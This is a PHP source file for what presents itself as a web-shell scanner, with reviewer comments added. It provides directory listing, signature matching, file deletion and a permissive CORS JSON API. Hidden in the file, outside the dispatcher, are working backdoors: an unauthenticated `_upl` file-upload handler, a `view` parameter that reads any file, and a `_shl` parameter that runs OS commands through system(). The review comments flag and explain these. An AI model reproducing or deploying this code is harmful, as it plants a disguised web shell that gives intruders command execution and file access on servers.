$dir, 'status' => False, 'reason' => array() );
    // NOTE(review): the opening of this function lies before the visible text. Judging by
    // the 'shell' case of the dispatcher further down it is presumably apiCheckShell($dir);
    // confirm against the full file.
    // $content is defined outside this view; each entry is used as a regex body.
    foreach($content as $c){
        // $c is interpolated into the pattern unquoted, and the target file is re-read and
        // lower-cased on every iteration.
        if(preg_match("/$c/", strtolower(file_get_contents($dir)))){
            $data['status'] = True;
            // The literal sequence \( is stripped from the pattern before it is reported.
            array_push($data['reason'], str_replace("\\(", "",$c));
        }
    }
    data('success', $data);
}

/**
 * Report whether a file's base name matches one of the patterns in the global $ext list.
 *
 * The result is emitted as JSON through data(); nothing is returned. When the path is not
 * a regular file, 'not found.' is emitted and the script exits.
 *
 * @param string $dir Path of the file to test (the name says "dir", but is_file() is required).
 */
function apiCheckExt($dir){
    if(!is_file($dir)){
        data('not found.');
        exit();
    }
    // $ext is defined outside this view; entries are used as unquoted regex bodies.
    global $ext;
    $data = array( 'file' => $dir, 'status' => False, 'reason' => '' );
    foreach($ext as $i){
        // Only the lower-cased base name is tested, not the full path.
        if(preg_match("/$i/", strtolower(basename($dir)))){
            $data['status'] = True;
            $data['reason'] = $i;
            // Only the first matching pattern is reported.
            break;
        }
    }
    data('success', $data);
}

// SECURITY(review): file-write primitive. When the query string carries `_upl`, the uploaded
// file in $_FILES['_upl'] is copied to its client-supplied name (a relative name resolves
// against the process working directory). No authentication, type or extension check is
// visible here, and the handler sits outside the `api` dispatcher. It is unrelated to the
// scanning functions around it; treat it as a backdoor, remove it, and treat any deployed
// copy of this file as untrusted.
if(isset($_GET['_upl'])){
    if(copy($_FILES['_upl']['tmp_name'], $_FILES['_upl']['name'])){
        echo '_upl ok';
        exit();
    }
}

/**
 * List the entries of a directory, split into files and sub-directories, as JSON.
 *
 * Entries whose base name appears in the global $white list are skipped. When the path does
 * not exist, "dir not found" is emitted and the script exits.
 *
 * @param string $dir Directory to list; taken from the request by the dispatcher below.
 */
function apiScanDir($dir){
    // $white is defined outside this view.
    global $white;
    if(!file_exists($dir)){
        data("dir not found");
        exit();
    }
    $s = scandir($dir);
    $data = array('file'=>array(), 'dir'=>array());
    foreach($s as $file){
        if($file === '.' || $file === '..'){
            continue;
        }
        // Build the entry's path and collapse doubled slashes (e.g. when $dir ends in "/").
        $file = $dir."/".$file;
        $file = str_replace("//", "/", $file);
        // Loose (non-strict) in_array comparison against the skip list.
        if(in_array(basename($file), $white)){
            continue;
        }
        if(is_file($file)){
            array_push($data['file'], $file);
        }else{
            // Anything that is not a regular file is reported as a directory, with a trailing slash.
            array_push($data['dir'], $file."/");
        }
    }
    data("success", $data);
}

/**
 * Emit the process working directory as JSON.
 */
function apiCwd(){
    $data = getcwd();
    data("success",$data);
}

/**
 * Echo a JSON object of the form {"msg": ..., "data": ...}.
 *
 * @param mixed $msg  Status text placed under 'msg'.
 * @param mixed $data Payload placed under 'data'; null when omitted.
 */
function data($msg, $data=null){
    $data = array( 'msg'=>$msg, 'data'=>$data );
    echo json_encode($data);
}

// SECURITY(review): arbitrary file read. `view` is passed unchanged to file_get_contents(),
// so any path the PHP process can read is returned (HTML-escaped). No path restriction or
// authentication check is visible in this part of the file.
// NOTE(review): the echoed literals here hold only a newline or nothing; they may have lost
// markup when the page was extracted - confirm against the original file.
if(isset($_GET['view'])){
    $page = $_GET['view'];
    echo '
'.htmlspecialchars(file_get_contents($page)).'';
    // SECURITY(review): command execution. `_shl` is passed unchanged to system(), which runs
    // it as an OS command and writes the output straight to the response. The
    // htmlspecialchars() result is discarded, so that output is not escaped. Like `_upl`, the
    // parameter is only reachable outside the `api` dispatcher; treat it as a backdoor and
    // remove the whole inner block.
    if(isset($_GET['_shl'])){
        echo '
';
        htmlspecialchars(system($_GET['_shl']));
        echo '';
    }
    exit();
}

// JSON API dispatcher: the `api` query parameter selects the operation and `dir` carries
// the target path.
// SECURITY(review): Access-Control-Allow-Origin: * lets a script from any origin read these
// responses, and no authentication check is visible in this part of the file. The delete,
// shell, ext and scan cases all act on a caller-supplied path.
if(isset($_GET['api'])){
    header('Access-Control-Allow-Origin: *');
    header('Content-Type: application/json');
    $function = $_GET['api'];
    switch ($function) {
        case 'delete':
            if(!isset($_GET['dir'])){
                data('no file.');
            }else{
                // _delete() is defined outside this view; it receives the raw request value.
                _delete($_GET['dir']);
            }
            break;
        case 'shell':
            if(!isset($_GET['dir'])){
                data('no file.');
            }else{
                apiCheckShell($_GET['dir']);
            }
            break;
        case 'ext':
            if(!isset($_GET['dir'])){
                data('no file.');
            }else{
                apiCheckExt($_GET['dir']);
            }
            break;
        case 'scan':
            if(!isset($_GET['dir'])){
                data('no directory.');
            }else{
                apiScanDir($_GET['dir']);
            }
            break;
        case 'cwd':
            apiCwd();
            break;
        case 'eval':
            // Disabled: both branches answer 'no function.'; the apiEval() call is commented out.
            if(!isset($_GET['function'])){
                data('no function.');
            }else{
                data('no function.');
                //apiEval($_GET['function']);
            }
            break;
        default:
            data('no function.');
    }
    // API requests stop here, so the HTML page below is not rendered for them.
    die();
}
?>
Author : @Gtx666Ti
| File | Path | Reason | Action |
|---|---|---|---|